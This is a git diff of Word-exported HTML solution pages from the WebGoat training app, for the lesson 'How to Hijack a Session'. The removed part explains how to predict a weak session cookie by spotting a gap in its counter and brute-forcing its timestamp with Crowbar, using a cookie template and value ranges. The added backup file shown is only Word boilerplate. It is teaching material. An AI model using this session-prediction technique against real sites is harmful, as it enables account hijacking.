-yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
- type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=23
-src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
-to go to the tab "Analysis".<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
- type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=71
-src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
-pane you see nothing. <o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
- type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
-select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
- type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
-divided in 2 parts: the first part is an identifier that is added 1 in every
-cookie and a time value. The time value is calculated at the moment that you
-submit the request.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
-there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
-value that is missing is the value that you need to know to log on. Now you
-only need to calculate the timestamp. This can be brute-forced using Crowbar.
-You know the previous timestamp and the next timestamp so you have a start and
-end value.<br>
-You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
-<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
- type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=641 height=451
-src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
-value 16935 and a value 16937 with a numeric difference of 28110 instead of
-14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
-request in Crowbar:<o:p></o:p></span></p>
-
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
- o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=596 height=510
-src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
-
-<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
-field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
-<span style='mso-element:field-separator'></span><![endif]--><span
-style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
-to localhost and adjust the port.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
-response. Make sure that you see "How to hijack a session" in the middle
-window.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
-in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
-The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
-Start the first loop at 363093, the last digits of the last cookie before the
-authentication cookie and 363203, the first cookie after the authentication
-cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
-between these two boundaries.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
-results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
-reply".<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
- o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=642 height=461
-src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
-
-<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
-field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
-<span style='mso-element:field-separator'></span><![endif]--><span
-style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
-"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><o:p>&nbsp;</o:p></p>
-
-</div>
-<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
-	<tr>
-		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
-			Solution by Erwin Geirnaert 
-		</td>
-		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
-	</tr>
-</table>
 
 </body>
-
-</html>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.htmlBAK b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.htmlBAK
new file mode 100644
index 000000000..d2605b85c
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.htmlBAK
@@ -0,0 +1,889 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<title>Solution: How to Hijack a Session</title>
+<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
+<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>27</o:TotalTime>
+  <o:Created>2007-07-11T10:54:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>469</o:Words>
+  <o:Characters>2677</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>22</o:Lines>
+  <o:Paragraphs>6</o:Paragraphs>
+  <o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
+<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
